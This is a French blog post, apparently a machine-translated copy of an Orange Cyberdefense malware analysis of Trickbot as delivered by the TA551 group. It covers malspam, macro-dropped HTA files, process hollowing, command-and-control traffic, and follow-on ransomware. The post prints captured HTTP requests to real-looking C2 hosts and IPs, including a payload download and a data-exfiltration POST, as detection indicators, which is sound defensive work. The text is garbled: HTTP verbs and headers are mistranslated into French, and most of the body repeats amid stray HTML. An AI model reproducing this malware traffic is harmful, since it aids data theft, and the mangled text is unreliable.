De nos jours, nous n’avons plus affaire \u00e0 des virus grossi\u00e8rement assembl\u00e9s, de type homebrew. Les logiciels malveillants sont une industrie, et les d\u00e9veloppeurs professionnels se retrouvent pour \u00e9changer, que ce soit en volant son code ou en collaborant d\u00e9lib\u00e9r\u00e9ment. Les attaques sont multicouches de nos jours, avec diverses applications logicielles sophistiqu\u00e9es prenant en charge diff\u00e9rentes t\u00e2ches tout au long de la cha\u00eene d’attaque, de la compromission initiale \u00e0 l’exfiltration ou au cryptage ultime des donn\u00e9es. Les outils sp\u00e9cifiques \u00e0 chaque \u00e9tape sont hautement sp\u00e9cialis\u00e9s et peuvent souvent \u00eatre lou\u00e9s en tant que service, y compris le support client et les mod\u00e8les d’abonnement pour une utilisation (ab)professionnelle. De toute \u00e9vidence, cela a largement augment\u00e9 \u00e0 la fois la disponibilit\u00e9 et l’efficacit\u00e9 et l’impact potentiels des logiciels malveillants. \u00c7a fait peur\u00a0? <\/p>\n
Eh bien, c’est le cas, mais la professionnalisation apparente a aussi de bons c\u00f4t\u00e9s. L’un des facteurs est que certains modules r\u00e9utilis\u00e9s couramment trouv\u00e9s dans les logiciels malveillants peuvent \u00eatre utilis\u00e9s pour identifier, suivre et analyser les logiciels d’attaque professionnels. En fin de compte, cela signifie qu’avec suffisamment d’exp\u00e9rience, des analystes qualifi\u00e9s peuvent d\u00e9tecter et arr\u00eater les logiciels malveillants sur leur \u00e9lan, souvent avec peu ou pas de d\u00e9g\u00e2ts (si les attaquants franchissent les premi\u00e8res lignes de d\u00e9fense).<\/p>\n
Voyons ce m\u00e9canisme en action alors que nous suivons un v\u00e9ritable analyste de CyberSOC enqu\u00eatant sur le cas du malware surnomm\u00e9 “Trickbot”.<\/p>\n
Origines de Trickbot<\/strong><\/h2>\nLes CyberSOC d’Orange Cyberdefense suivent depuis un certain temps le malware sp\u00e9cifique nomm\u00e9 Trickbot. Il est commun\u00e9ment attribu\u00e9 \u00e0 un Threat Actor sp\u00e9cifique g\u00e9n\u00e9ralement connu sous le nom de Wizard Spider (Crowdstrike), UNC1778 (FireEye) ou Gold Blackburn (Secureworks).<\/p>\n
Trickbot est un cheval de Troie populaire et modulaire initialement utilis\u00e9 pour cibler le secteur bancaire, qui a \u00e9galement \u00e9t\u00e9 utilis\u00e9 pour compromettre des entreprises d’autres secteurs. Il d\u00e9livre plusieurs types de charges utiles. Trickbot a progressivement \u00e9volu\u00e9 pour \u00eatre utilis\u00e9 comme Malware-as-a-Service (MaaS) par diff\u00e9rents groupes d’attaque.<\/p>\n
L’acteur de la menace derri\u00e8re est connu pour agir rapidement, en utilisant l’outil de post-exploitation bien connu Cobalt Strike pour se d\u00e9placer lat\u00e9ralement sur l’infrastructure r\u00e9seau de l’entreprise et d\u00e9ployer des ransomwares comme Ryuk ou Conti comme \u00e9tape finale. Comme il est utilis\u00e9 pour l’acc\u00e8s initial, \u00eatre capable de d\u00e9tecter cette menace le plus rapidement possible est un \u00e9l\u00e9ment cl\u00e9 du succ\u00e8s pour pr\u00e9venir de nouvelles attaques.<\/p>\n
Cette analyse des menaces se concentrera sur l’acteur mena\u00e7ant nomm\u00e9 TA551 et son utilisation de Trickbot comme exemple. Je pr\u00e9senterai comment nous sommes en mesure d’effectuer une d\u00e9tection aux diff\u00e9rentes \u00e9tapes de la cha\u00eene de destruction, en partant de l’infection initiale par des campagnes de malspam, en passant \u00e0 la d\u00e9tection des outils utilis\u00e9s par l’acteur de la menace lors de la compromission. Nous fournirons \u00e9galement des informations suppl\u00e9mentaires sur la fa\u00e7on dont l’auteur de la menace utilise ce malware et l’\u00e9volution qu’il a fallu.<\/p>\n
1 <\/strong>\u2014 Acc\u00e8s initial<\/strong><\/h4>\n\n<\/ol>\nDepuis juin 2021, le groupe TA551 a commenc\u00e9 \u00e0 livrer le malware Trickbot en utilisant un zip crypt\u00e9. L’email pr\u00e9texte imite une information importante pour diminuer la vigilance de l’utilisateur.<\/p>\n
La pi\u00e8ce jointe comprend un fichier .zip qui comprend \u00e0 nouveau un document. Le fichier zip utilise toujours le m\u00eame nom que “request.zip” ou “info.zip”, et le m\u00eame nom pour le fichier du document.<\/p>\n
NB : The Threat Actor a utilis\u00e9 le m\u00eame modus operandi avant\/en parall\u00e8le \u00e0 Trickbot pour d\u00e9livrer d’autres malwares. Nous avons observ\u00e9 durant la m\u00eame p\u00e9riode, de juin 2021 \u00e0 septembre 2021, l’utilisation de Bazarloader sur la charge utile d’acc\u00e8s initiale.<\/i><\/p>\n2 <\/strong>\u2014 Ex\u00e9cution<\/strong><\/h4>\n\n<\/ol>\nLorsque l’utilisateur ouvre le document avec les macros activ\u00e9es, un fichier HTA est d\u00e9pos\u00e9 sur le syst\u00e8me et lanc\u00e9 \u00e0 l’aide de cmd.exe. Le fichier HTA est utilis\u00e9 pour t\u00e9l\u00e9charger la DLL Trickbot \u00e0 partir d’un serveur distant.<\/p>\n
Ce comportement est li\u00e9 \u00e0 TA551, nous pouvons l’identifier avec le motif “\/bdfh\/” dans la requ\u00eate GET.<\/p>\n
\nOBTENIR \/bdfh\/M8v[..]VUb HTTP\/1.1<\/i><\/p>\n
Accepter: *\/*<\/i><\/p>\n
H\u00e9bergeur : wilkinstransportss.com<\/i><\/p>\n
Content-Type\u00a0: application\/octet-stream<\/i><\/p>\n<\/blockquote>\n
NB : Les motifs li\u00e9s au TA551 ont \u00e9volu\u00e9 avec le temps, depuis mi-ao\u00fbt 2021, le motif a chang\u00e9 en “\/bmdff\/”. La DLL est enregistr\u00e9e en tant que fichier jpg pour masquer la v\u00e9ritable extension, et elle essaie d’\u00eatre ex\u00e9cut\u00e9e via regsvr32.exe. Ensuite, Trickbot sera inject\u00e9 dans “wermgr.exe” en utilisant les techniques de Process Hollowing.<\/p>\n
\n\n\n![\"\"](\"https:\/\/teknomers.com\/fr\/wp-content\/uploads\/2022\/05\/1653390498_447_Analyse-des-logiciels-malveillants-Trickbot.jpg\")
<\/td>\n<\/tr>\n \nFigure 1 – Ex\u00e9cution de Trickbot dans le bac \u00e0 sable<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n3 <\/strong>\u2014 Le recueil<\/strong><\/h4>\n\n<\/ol>\nApr\u00e8s la compromission initiale r\u00e9ussie du syst\u00e8me, Trickbot peut collecter de nombreuses informations sur sa cible \u00e0 l’aide d’ex\u00e9cutables Windows l\u00e9gitimes et identifier si le syst\u00e8me est membre d’un domaine Active Directory. <\/p>\n
De plus, pour cette collection, Trickbot analysera plus d’informations comme la version de Windows, l’adresse IP publique, l’utilisateur qui ex\u00e9cute Trickbot, et aussi si le syst\u00e8me est derri\u00e8re un pare-feu NAT.<\/p>\n
Trickbot est \u00e9galement capable de collecter des informations sensibles comme des donn\u00e9es bancaires ou des identifiants, et de les exfiltrer vers un serveur de commande et de contr\u00f4le d\u00e9di\u00e9 (C2).<\/p>\n
4 <\/strong>\u2014 Commandement et contr\u00f4le<\/strong><\/h4>\n\n<\/ol>\nLorsque le syst\u00e8me est infect\u00e9, il peut contacter plusieurs types de Trickbot C2. Le C2 principal est celui avec lequel le syst\u00e8me victime va communiquer, principalement pour obtenir de nouvelles instructions.<\/p>\n
Toutes les requ\u00eates adress\u00e9es \u00e0 un Trickbot C2 utilisent le format suivant\u00a0:<\/p>\n
\n“\/\/\/\/<suppl\u00e9mentaire <\/p>\n
informations sur la commande>\/”<\/p>\n<\/blockquote>\n
\nOBTENIR \/zev4\/56dLzNyzsmBH06b_W10010240.42DF9F315753F31B13F17F5E731B7787\/0\/Windows 10 x64\/1108\/XX.XX.XX.XX\/38245433F0E3D5689F6EE84483106F4382CC920EAFAD512EAFAD<\/i><\/p>\n
6571D97A519A2EF29\/0bqjxzSOQUSLPRJMQSWKDHTHKEG\/ HTTP\/1.1<\/i><\/p>\n
Connexion\u00a0: Keep-Alive<\/i><\/p>\n
Agent utilisateur : curl\/7.74.0<\/i><\/p>\n
H\u00f4te : 202.165.47.106<\/i><\/p><\/blockquote>\n
Toutes les donn\u00e9es collect\u00e9es sont envoy\u00e9es \u00e0 un Exfiltration Trickbot C2 s\u00e9par\u00e9 \u00e0 l’aide des m\u00e9thodes de requ\u00eate HTTP POST. Le format de requ\u00eate reste le m\u00eame, mais la commande “90” est sp\u00e9cifique \u00e0 l’exfiltration de donn\u00e9es, plus pr\u00e9cis\u00e9ment aux donn\u00e9es syst\u00e8me collect\u00e9es sur le syst\u00e8me infect\u00e9.<\/p>\n
\nPOSTE \/zev4\/56dLzNyzsmBH06b_W10010240.42DF9F315753F31B13F17F5E731B7787\/90\/ HTTP\/1.1<\/i><\/p>\n
Connexion\u00a0: Keep-Alive<\/i><\/p>\n
Type de contenu\u00a0: multipart\/form-data\u00a0; fronti\u00e8re=——Li\u00e9<\/i><\/p>\n
ary0F79C562<\/i><\/p>\n
Agent utilisateur\u00a0: Ghost<\/i><\/p>\n
H\u00f4te : 24.242.237.172:443<\/i><\/p>\n<\/blockquote>\nAttaques de suivi\u00a0: Cobalt Strike, Ryuk, Conti<\/strong><\/h2>\nFrappe de cobalt[1] est un outil d’acc\u00e8s \u00e0 distance commercial, complet et qui s’appelle un “logiciel de simulation d’adversaire con\u00e7u pour ex\u00e9cuter des attaques cibl\u00e9es et \u00e9muler les actions post-exploitation d’acteurs de menace avanc\u00e9s”. Les capacit\u00e9s post-exploit interactives de Cobalt Strike couvrent toute la gamme des tactiques ATT&CK, toutes ex\u00e9cut\u00e9es dans un seul syst\u00e8me int\u00e9gr\u00e9.<\/p>\n
Dans notre contexte, Trickbot utilise le processus d\u00e9tourn\u00e9 wermgr.exe pour charger une balise Cobalt Strike en m\u00e9moire.<\/p>\n
Plusieurs op\u00e9rateurs de ran\u00e7ongiciels sont \u00e9galement affili\u00e9s aux acteurs de la menace. Le but de Trickbot est d’effectuer l’acc\u00e8s initial pr\u00e9c\u00e9dant l’attaque r\u00e9elle du ransomware. Conti et Ryuk sont les principaux ransomwares observ\u00e9s au stade final des infections Trickbot, mais de loin pas les seuls. Conti est un groupe qui exploite un mod\u00e8le Ransomware-as-a-Service et est disponible pour plusieurs acteurs de menace affili\u00e9s. Ryuk, d’autre part, est un ran\u00e7ongiciel qui est directement li\u00e9 \u00e0 l’acteur mena\u00e7ant derri\u00e8re Trickbot.<\/p>\n
Principaux enseignements<\/strong><\/h2>\nLes auteurs de menaces utilisent encore souvent des techniques de base pour acc\u00e9der au r\u00e9seau, comme les e-mails de phishing. Sensibiliser au phishing est certainement une premi\u00e8re \u00e9tape importante dans le renforcement de la cyber-r\u00e9silience. Les meilleures attaques sont, apr\u00e8s tout, celles qui ne commencent m\u00eame jamais.<\/p>\n
Bien s\u00fbr, il n’existe pas de protection pr\u00e9ventive \u00e0 l’\u00e9preuve des balles dans le cyber. Il est d’autant plus important d’avoir la capacit\u00e9 de d\u00e9tecter Trickbot \u00e0 un stade pr\u00e9coce. Bien que la cha\u00eene d’attaque puisse \u00eatre interrompue \u00e0 chaque \u00e9tape du processus : plus elle est tardive, plus le risque de compromission totale et les dommages qui en r\u00e9sultent sont \u00e9lev\u00e9s. Trickbot est utilis\u00e9 par diff\u00e9rents acteurs de la menace, mais l’approche de d\u00e9tection reste la m\u00eame sur la plupart de ses \u00e9tapes sp\u00e9cifiques. Certains des indicateurs de compromis sont expliqu\u00e9s ici. Mais les logiciels malveillants re\u00e7oivent \u00e9galement des mises \u00e0 jour. <\/p>\n
Les analystes doivent rester vigilants. Le suivi et la surveillance d’un logiciel malveillant sp\u00e9cifique ou d’un acteur mena\u00e7ant est essentiel pour suivre son \u00e9volution, son am\u00e9lioration et se tenir au courant d’une d\u00e9tection efficace de la menace.<\/p>\n
Ceci est une histoire des tranch\u00e9es trouv\u00e9es dans le Navigateur de s\u00e9curit\u00e9<\/a>. Vous y trouverez \u00e9galement d’autres analyses de logiciels malveillants et d’autres \u00e9l\u00e9ments int\u00e9ressants, notamment des comptes rendus d’op\u00e9rations d’intervention d’urgence et le point de vue d’un scientifique criminel sur la cyber-extorsion, ainsi que des tonnes de faits et de chiffres sur le paysage de la s\u00e9curit\u00e9 en g\u00e9n\u00e9ral. Le rapport complet est disponible en t\u00e9l\u00e9chargement sur le site Orange Cyberdefense, alors n’h\u00e9sitez pas \u00e0 le consulter. \u00c7a en vaut la peine!<\/p>\n[1] MITRE ATT&CK Frappe Cobalt : https:\/\/attack.mitre.org\/software\/S0154\/<\/a><\/i><\/p>\n
- \n<\/ol>\n
Depuis juin 2021, le groupe TA551 a commenc\u00e9 \u00e0 livrer le malware Trickbot en utilisant un zip crypt\u00e9. L’email pr\u00e9texte imite une information importante pour diminuer la vigilance de l’utilisateur.<\/p>\n
La pi\u00e8ce jointe comprend un fichier .zip qui comprend \u00e0 nouveau un document. Le fichier zip utilise toujours le m\u00eame nom que “request.zip” ou “info.zip”, et le m\u00eame nom pour le fichier du document.<\/p>\n
NB : The Threat Actor a utilis\u00e9 le m\u00eame modus operandi avant\/en parall\u00e8le \u00e0 Trickbot pour d\u00e9livrer d’autres malwares. Nous avons observ\u00e9 durant la m\u00eame p\u00e9riode, de juin 2021 \u00e0 septembre 2021, l’utilisation de Bazarloader sur la charge utile d’acc\u00e8s initiale.<\/i><\/p>\n Lorsque l’utilisateur ouvre le document avec les macros activ\u00e9es, un fichier HTA est d\u00e9pos\u00e9 sur le syst\u00e8me et lanc\u00e9 \u00e0 l’aide de cmd.exe. Le fichier HTA est utilis\u00e9 pour t\u00e9l\u00e9charger la DLL Trickbot \u00e0 partir d’un serveur distant.<\/p>\n Ce comportement est li\u00e9 \u00e0 TA551, nous pouvons l’identifier avec le motif “\/bdfh\/” dans la requ\u00eate GET.<\/p>\n OBTENIR \/bdfh\/M8v[..]VUb HTTP\/1.1<\/i><\/p>\n Accepter: *\/*<\/i><\/p>\n H\u00e9bergeur : wilkinstransportss.com<\/i><\/p>\n Content-Type\u00a0: application\/octet-stream<\/i><\/p>\n<\/blockquote>\n NB : Les motifs li\u00e9s au TA551 ont \u00e9volu\u00e9 avec le temps, depuis mi-ao\u00fbt 2021, le motif a chang\u00e9 en “\/bmdff\/”. La DLL est enregistr\u00e9e en tant que fichier jpg pour masquer la v\u00e9ritable extension, et elle essaie d’\u00eatre ex\u00e9cut\u00e9e via regsvr32.exe. Ensuite, Trickbot sera inject\u00e9 dans “wermgr.exe” en utilisant les techniques de Process Hollowing.<\/p>\n Apr\u00e8s la compromission initiale r\u00e9ussie du syst\u00e8me, Trickbot peut collecter de nombreuses informations sur sa cible \u00e0 l’aide d’ex\u00e9cutables Windows l\u00e9gitimes et identifier si le syst\u00e8me est membre d’un domaine Active Directory. <\/p>\n De plus, pour cette collection, Trickbot analysera plus d’informations comme la version de Windows, l’adresse IP publique, l’utilisateur qui ex\u00e9cute Trickbot, et aussi si le syst\u00e8me est derri\u00e8re un pare-feu NAT.<\/p>\n Trickbot est \u00e9galement capable de collecter des informations sensibles comme des donn\u00e9es bancaires ou des identifiants, et de les exfiltrer vers un serveur de commande et de contr\u00f4le d\u00e9di\u00e9 (C2).<\/p>\n Lorsque le syst\u00e8me est infect\u00e9, il peut contacter plusieurs types de Trickbot C2. Le C2 principal est celui avec lequel le syst\u00e8me victime va communiquer, principalement pour obtenir de nouvelles instructions.<\/p>\n Toutes les requ\u00eates adress\u00e9es \u00e0 un Trickbot C2 utilisent le format suivant\u00a0:<\/p>\n “\/\/\/\/<suppl\u00e9mentaire <\/p>\n informations sur la commande>\/”<\/p>\n<\/blockquote>\n OBTENIR \/zev4\/56dLzNyzsmBH06b_W10010240.42DF9F315753F31B13F17F5E731B7787\/0\/Windows 10 x64\/1108\/XX.XX.XX.XX\/38245433F0E3D5689F6EE84483106F4382CC920EAFAD512EAFAD<\/i><\/p>\n 6571D97A519A2EF29\/0bqjxzSOQUSLPRJMQSWKDHTHKEG\/ HTTP\/1.1<\/i><\/p>\n Connexion\u00a0: Keep-Alive<\/i><\/p>\n Agent utilisateur : curl\/7.74.0<\/i><\/p>\n H\u00f4te : 202.165.47.106<\/i><\/p><\/blockquote>\n Toutes les donn\u00e9es collect\u00e9es sont envoy\u00e9es \u00e0 un Exfiltration Trickbot C2 s\u00e9par\u00e9 \u00e0 l’aide des m\u00e9thodes de requ\u00eate HTTP POST. Le format de requ\u00eate reste le m\u00eame, mais la commande “90” est sp\u00e9cifique \u00e0 l’exfiltration de donn\u00e9es, plus pr\u00e9cis\u00e9ment aux donn\u00e9es syst\u00e8me collect\u00e9es sur le syst\u00e8me infect\u00e9.<\/p>\n POSTE \/zev4\/56dLzNyzsmBH06b_W10010240.42DF9F315753F31B13F17F5E731B7787\/90\/ HTTP\/1.1<\/i><\/p>\n Connexion\u00a0: Keep-Alive<\/i><\/p>\n Type de contenu\u00a0: multipart\/form-data\u00a0; fronti\u00e8re=——Li\u00e9<\/i><\/p>\n ary0F79C562<\/i><\/p>\n Agent utilisateur\u00a0: Ghost<\/i><\/p>\n H\u00f4te : 24.242.237.172:443<\/i><\/p>\n<\/blockquote>\n Frappe de cobalt[1] est un outil d’acc\u00e8s \u00e0 distance commercial, complet et qui s’appelle un “logiciel de simulation d’adversaire con\u00e7u pour ex\u00e9cuter des attaques cibl\u00e9es et \u00e9muler les actions post-exploitation d’acteurs de menace avanc\u00e9s”. Les capacit\u00e9s post-exploit interactives de Cobalt Strike couvrent toute la gamme des tactiques ATT&CK, toutes ex\u00e9cut\u00e9es dans un seul syst\u00e8me int\u00e9gr\u00e9.<\/p>\n Dans notre contexte, Trickbot utilise le processus d\u00e9tourn\u00e9 wermgr.exe pour charger une balise Cobalt Strike en m\u00e9moire.<\/p>\n Plusieurs op\u00e9rateurs de ran\u00e7ongiciels sont \u00e9galement affili\u00e9s aux acteurs de la menace. Le but de Trickbot est d’effectuer l’acc\u00e8s initial pr\u00e9c\u00e9dant l’attaque r\u00e9elle du ransomware. Conti et Ryuk sont les principaux ransomwares observ\u00e9s au stade final des infections Trickbot, mais de loin pas les seuls. Conti est un groupe qui exploite un mod\u00e8le Ransomware-as-a-Service et est disponible pour plusieurs acteurs de menace affili\u00e9s. Ryuk, d’autre part, est un ran\u00e7ongiciel qui est directement li\u00e9 \u00e0 l’acteur mena\u00e7ant derri\u00e8re Trickbot.<\/p>\n Les auteurs de menaces utilisent encore souvent des techniques de base pour acc\u00e9der au r\u00e9seau, comme les e-mails de phishing. Sensibiliser au phishing est certainement une premi\u00e8re \u00e9tape importante dans le renforcement de la cyber-r\u00e9silience. Les meilleures attaques sont, apr\u00e8s tout, celles qui ne commencent m\u00eame jamais.<\/p>\n Bien s\u00fbr, il n’existe pas de protection pr\u00e9ventive \u00e0 l’\u00e9preuve des balles dans le cyber. Il est d’autant plus important d’avoir la capacit\u00e9 de d\u00e9tecter Trickbot \u00e0 un stade pr\u00e9coce. Bien que la cha\u00eene d’attaque puisse \u00eatre interrompue \u00e0 chaque \u00e9tape du processus : plus elle est tardive, plus le risque de compromission totale et les dommages qui en r\u00e9sultent sont \u00e9lev\u00e9s. Trickbot est utilis\u00e9 par diff\u00e9rents acteurs de la menace, mais l’approche de d\u00e9tection reste la m\u00eame sur la plupart de ses \u00e9tapes sp\u00e9cifiques. Certains des indicateurs de compromis sont expliqu\u00e9s ici. Mais les logiciels malveillants re\u00e7oivent \u00e9galement des mises \u00e0 jour. <\/p>\n Les analystes doivent rester vigilants. Le suivi et la surveillance d’un logiciel malveillant sp\u00e9cifique ou d’un acteur mena\u00e7ant est essentiel pour suivre son \u00e9volution, son am\u00e9lioration et se tenir au courant d’une d\u00e9tection efficace de la menace.<\/p>\n Ceci est une histoire des tranch\u00e9es trouv\u00e9es dans le Navigateur de s\u00e9curit\u00e9<\/a>. Vous y trouverez \u00e9galement d’autres analyses de logiciels malveillants et d’autres \u00e9l\u00e9ments int\u00e9ressants, notamment des comptes rendus d’op\u00e9rations d’intervention d’urgence et le point de vue d’un scientifique criminel sur la cyber-extorsion, ainsi que des tonnes de faits et de chiffres sur le paysage de la s\u00e9curit\u00e9 en g\u00e9n\u00e9ral. Le rapport complet est disponible en t\u00e9l\u00e9chargement sur le site Orange Cyberdefense, alors n’h\u00e9sitez pas \u00e0 le consulter. \u00c7a en vaut la peine!<\/p>\n [1] MITRE ATT&CK Frappe Cobalt : https:\/\/attack.mitre.org\/software\/S0154\/<\/a><\/i><\/p>\n2 <\/strong>\u2014 Ex\u00e9cution<\/strong><\/h4>\n
\n<\/ol>\n
\n
\n\n
\n <\/td>\n<\/tr>\n\n Figure 1 – Ex\u00e9cution de Trickbot dans le bac \u00e0 sable<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n 3 <\/strong>\u2014 Le recueil<\/strong><\/h4>\n
\n<\/ol>\n
4 <\/strong>\u2014 Commandement et contr\u00f4le<\/strong><\/h4>\n
\n<\/ol>\n
\n
\n
\n
Attaques de suivi\u00a0: Cobalt Strike, Ryuk, Conti<\/strong><\/h2>\n
Principaux enseignements<\/strong><\/h2>\n